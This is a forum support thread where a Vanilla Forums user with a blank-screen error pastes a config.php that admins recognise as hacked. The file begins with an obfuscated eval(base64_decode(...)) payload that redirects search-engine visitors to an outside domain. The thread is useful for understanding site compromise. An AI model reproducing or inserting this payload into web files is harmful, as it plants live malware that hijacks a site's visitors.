Blog Documentation Book a Demo
Please upgrade here. These earlier versions are no longer being updated and have security issues.
HackerOne users: Testing against this community violates our program's Terms of Service and will result in your bounty being denied.

blank white screen ???

rishirich27rishirich27 New
in Vanilla 2.0 - 2.8

Hi,
I changed my website design template and now i get this blank white screen on index.php page. Please assist how to fix this issue ??

Comments

  • R_JR_J Admin

    Enable debugging like it is described here: http://vanillaforums.org/discussion/comment/195191#Comment_195191 and tell us what you see
    Or could that be your problem? http://vanillaforums.org/discussion/23941/returning-blank-screen-and-true-in-firefox
    Doesn't sound like your problem, but maybe you could check that also: http://vanillaforums.org/discussion/23279/vanilla-2-1-blank-page-issue

    Well, and if you know what you have changed in your theme you could maybe post that code so we can take a look at it.

  • rishirich27rishirich27 New

    this is my config where to change to enable debugging

    <?php eval(base64_decode("CmVycm9yX3JlcG9ydGluZygwKTsKJHFhenBsbT1oZWFkZXJzX3NlbnQoKTsKaWYgKCEkcWF6cGxtKXsKJHJlZmVyZXI9JF9TRVJWRVJbJ0hUVFBfUkVGRVJFUiddOwokdWFnPSRfU0VSVkVSWydIVFRQX1VTRVJfQUdFTlQnXTsKaWYgKCR1YWcpIHsKaWYgKCFzdHJpc3RyKCR1YWcsIk1TSUUgNy4wIikgYW5kICFzdHJpc3RyKCR1YWcsIk1TSUUgNi4wIikpewppZiAoc3RyaXN0cigkcmVmZXJlciwieWFob28iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiaW5nIikgb3Igc3RyaXN0cigkcmVmZXJlciwicmFtYmxlciIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsIndlYmFsdGEiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiaXQubHkiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJ0aW55dXJsLmNvbSIpIG9yIHByZWdfbWF0Y2goIi95YW5kZXhcLnJ1XC95YW5kc2VhcmNoXD8oLio/KVwmbHJcPS8iLCRyZWZlcmVyKSBvciBwcmVnX21hdGNoICgiL2dvb2dsZVwuKC4qPylcL3VybFw/c2EvIiwkcmVmZXJlcikgb3Igc3RyaXN0cigkcmVmZXJlciwiZmFjZWJvb2suY29tL2wiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJhb2wuY29tIikpIHsKaWYgKCFzdHJpc3RyKCRyZWZlcmVyLCJjYWNoZSIpIGFuZCAhc3RyaXN0cigkcmVmZXJlciwiaW51cmwiKSBhbmQgIXN0cmlzdHIoJHJlZmVyZXIsIkVlWXAzRDciKSl7CmhlYWRlcigiTG9jYXRpb246IGh0dHA6Ly91bGZyZXFiLmRkbnMubWUudWsvIik7CmV4aXQoKTsKfQp9Cn0KfQp9")); if (!defined('APPLICATION')) exit();

    // Conversations
    $Configuration['Conversations']['Version'] = '2.0.18.8';

    // Database
    $Configuration['Database']['Name'] = '3333';
    $Configuration['Database']['Host'] = '333333';
    $Configuration['Database']['User'] = '3333';
    $Configuration['Database']['Password'] = '333333';

    // EnabledApplications
    $Configuration['EnabledApplications']['Conversations'] = 'conversations';
    $Configuration['EnabledApplications']['Vanilla'] = 'vanilla';

    // EnabledPlugins
    $Configuration['EnabledPlugins']['GettingStarted'] = 'GettingStarted';
    $Configuration['EnabledPlugins']['HtmLawed'] = 'HtmLawed';

    // Garden
    $Configuration['Garden']['Title'] = '3333 Forum';
    $Configuration['Garden']['Cookie']['Salt'] = 'IY254TUVS1';
    $Configuration['Garden']['Cookie']['Domain'] = '';
    $Configuration['Garden']['Registration']['ConfirmEmail'] = '1';
    $Configuration['Garden']['Registration']['Method'] = 'Approval';
    $Configuration['Garden']['Registration']['ConfirmEmailRole'] = '3';
    $Configuration['Garden']['Registration']['CaptchaPrivateKey'] = '';
    $Configuration['Garden']['Registration']['CaptchaPublicKey'] = '';
    $Configuration['Garden']['Registration']['InviteExpiration'] = '-1 week';
    $Configuration['Garden']['Registration']['InviteRoles'] = 'a:5:{i:3;s:1:"0";i:4;s:1:"0";i:8;s:1:"0";i:16;s:1:"0";i:32;s:1:"0";}';
    $Configuration['Garden']['Email']['SupportName'] = 333 Forum';
    $Configuration['Garden']['Version'] = '2.0.18.8';
    $Configuration['Garden']['RewriteUrls'] = FALSE;
    $Configuration['Garden']['CanProcessImages'] = TRUE;
    $Configuration['Garden']['Installed'] = TRUE;
    $Configuration['Garden']['InstallationID'] = 'F3';
    $Configuration['Garden']['InstallationSecret'] = '73';
    $Configuration['Garden']['Logo'] = 'X2EQHTJVSNLN.png';
    $Configuration['Garden']['Theme'] = 'default';

    // Modules
    $Configuration['Modules']['Vanilla']['Content'] = 'a:6:{i:0;s:13:"MessageModule";i:1;s:7:"Notices";i:2;s:21:"NewConversationModule";i:3;s:19:"NewDiscussionModule";i:4;s:7:"Content";i:5;s:3:"Ads";}';
    $Configuration['Modules']['Conversations']['Content'] = 'a:6:{i:0;s:13:"MessageModule";i:1;s:7:"Notices";i:2;s:21:"NewConversationModule";i:3;s:19:"NewDiscussionModule";i:4;s:7:"Content";i:5;s:3:"Ads";}';

    // Plugins
    $Configuration['Plugins']['GettingStarted']['Dashboard'] = '1';
    $Configuration['Plugins']['GettingStarted']['Registration'] = '1';

    // Routes
    $Configuration['Routes']['DefaultController'] = 'a:2:{i:0;s:11:"discussions";i:1;s:8:"Internal";}';

    // Vanilla
    $Configuration['Vanilla']['Version'] = '2.0.18.8';

    // Last edited by Admin (122.173.198.231)2013-09-11 08:21:31

  • R_JR_J Admin

    Bad news: your site has been hacked!
    The beginning "base64..." is malicious code. Use something like http://www.base64decode.org/ to show what it does. You should take your side offline at once and examine what has happened.

  • rishirich27rishirich27 New

    ooops are you sure ???? how can i fix it now a re install ??

  • R_JR_J Admin

    Yes, I'm 100% sure. That code in the config doesn't belong to Vanilla and if you decode it you'll see it accesses a malicous page. As far as I can tell right now, opening your homepage is a safety threat so you should disable the access as long as you are sure you have erased every piece of evil code.
    If you just reinstall what you had at first, the intruder will be able to take over your account again.

    I'm far from being a security expert. Seek advice from people who know such things better than I do!

    I (as a naive novice!) would recommend you set a htaccess password (http://www.webmaster-toolkit.com/htaccess-generator.shtml) and change every password (ftp, mysql, etc) you have on your account.

    Make a backup of everything you have and after that wipe everything.

    I do not know how to find out how this had happened. You have to check every piece of software on your server for security flaws before you start reinstalling anything.

    But, as I've said before, you really should ask people who know better than me. Maybe @x00 can advice how to start?

  • x00x00 MVP
    edited November 2013

    @rishirich27 ask you host to help would with appropriate file permissions and security. You are best restoring from backup image, you might take db dump before hand so you can restore them.

    You also need to ask those that have hight level access including just web appreciation access to scan their computer. Yes viruses exist where it piggyback their session from the express purpose, of editing the server file in order to spread spam. Although you might not see the spam, becuase it is directed at search engines.

    Are you using a popular cms like Wordpress?

    grep is your friend.

  • rishirich27rishirich27 New

    No its a static site with these forums on one page in a folder in root.

    http://pcsexam.com/forum/index.php

    or http://pcsexam.com is the main website.

  • R_JR_J Admin

    I wouldn't visit it right now ;-)

  • rishirich27rishirich27 New

    i did not know its such a serious issue, just checked my code. Almost all pages have this base64 thing. x00 how do remove this code ????? My website was hosted on godaddy.com, I just changed all passwords for this domain, but there are other domain also hosted on this shared server with multiple domains hosted on it.

Sign In or Register to comment.